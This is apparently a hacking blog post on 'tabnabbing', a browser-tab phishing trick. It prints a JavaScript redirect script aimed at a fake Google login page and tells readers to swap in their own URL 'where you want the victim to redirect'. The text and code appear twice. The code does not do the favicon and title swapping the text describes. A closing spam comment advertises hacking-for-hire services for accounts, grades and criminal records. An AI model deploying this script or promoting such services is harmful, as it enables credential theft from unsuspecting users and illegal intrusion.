Traditional phishing attacks are reasonably easy to avoid, just don’t click links in suspicious e-mails (or, for the really paranoid, any e-mail). But Firefox Creative Lead Aza Raskin has found a far more devious way to launch an attack by hijacking your unattended browser tabs.
The attack works by first detecting that the tab the page is in does not have focus. Then the attacking script can change the tab favicon and title before loading a new site, say a fake version of gmail or orkut, in the background. Even scarier, the attack can parse through your history to find sites you actually visit and impersonate them. Because most of us trust our tabs to remain on the page we left them on, this is a particularly difficult attack to detect. As Raskin writes, "as the user scans their many open tabs, the favicon and title act as a strong visual cue — memory is mailable and moldable and the user will most likely simply think they left *the+ tab open.” The only clue that you’re being tricked is that the URL will be wrong.
The Script Used is as Below.-
<a> open this in a tab of your browser and wait for 10 seconds and see after you come back but leave this page and go
to other tab to see this magic.</a>
<script type="text/javascript">
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;
function initRedirect(){
if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz
xScroll = document.body.scrollLeft;
yScroll = document.body.scrollTop;
clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect
timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect = setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'",10000); //set timed
redirect
}
else if (typeof window.pageYOffset != "undefined"){ //other browsers that support pageYOffset/pageXOffset instead
xScroll = window.pageXOffset;
yScroll = window.pageYOffset;
clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect
timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect = setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'",10000); //set timed
redirect
}
//else do nothing
}
function pollActivity(){
if ((typeof document.body.scrollTop != "undefined" && (xScroll!=document.body.scrollLeft ||
yScroll!=document.body.scrollTop)) //IE/NS7/Moz
||
(typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset))) {
//other browsers
initRedirect(); //reset polling scroll position
}
} document.onmousemove=initRedirect;
document.onclick=initRedirect;
document.onkeydown=initRedirect;
window.onload=initRedirect;
window.onresize=initRedirect;
</script>
To See The Demo Of this Attack Click Here
Replace the URL highlighted here with your URL where you want the victim to redirect.
Use This Script in the Page and then the page will redirect after 10 sec when the user if not on the particular tab.
The attack works by first detecting that the tab the page is in does not have focus. Then the attacking script can change the tab favicon and title before loading a new site, say a fake version of gmail or orkut, in the background. Even scarier, the attack can parse through your history to find sites you actually visit and impersonate them. Because most of us trust our tabs to remain on the page we left them on, this is a particularly difficult attack to detect. As Raskin writes, "as the user scans their many open tabs, the favicon and title act as a strong visual cue — memory is mailable and moldable and the user will most likely simply think they left *the+ tab open.” The only clue that you’re being tricked is that the URL will be wrong.
The Script Used is as Below.-
<a> open this in a tab of your browser and wait for 10 seconds and see after you come back but leave this page and go
to other tab to see this magic.</a>
<script type="text/javascript">
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;
function initRedirect(){
if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz
xScroll = document.body.scrollLeft;
yScroll = document.body.scrollTop;
clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect
timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect = setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'",10000); //set timed
redirect
}
else if (typeof window.pageYOffset != "undefined"){ //other browsers that support pageYOffset/pageXOffset instead
xScroll = window.pageXOffset;
yScroll = window.pageYOffset;
clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect
timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect = setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'",10000); //set timed
redirect
}
//else do nothing
}
function pollActivity(){
if ((typeof document.body.scrollTop != "undefined" && (xScroll!=document.body.scrollLeft ||
yScroll!=document.body.scrollTop)) //IE/NS7/Moz
||
(typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset))) {
//other browsers
initRedirect(); //reset polling scroll position
}
} document.onmousemove=initRedirect;
document.onclick=initRedirect;
document.onkeydown=initRedirect;
window.onload=initRedirect;
window.onresize=initRedirect;
</script>
To See The Demo Of this Attack Click Here
Replace the URL highlighted here with your URL where you want the victim to redirect.
Use This Script in the Page and then the page will redirect after 10 sec when the user if not on the particular tab.
Do you need to increase your credit score?
ReplyDeleteDo you intend to upgrade your school grade?
Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
Do you need any information concerning any database.
Do you need to retrieve deleted files?
Do you need to clear your criminal records or DMV?
Do you want to remove any site or link from any blog?
you should contact this hacker, he is reliable and good at the hack jobs..
contact : cybergoldenhacker at gmail dot com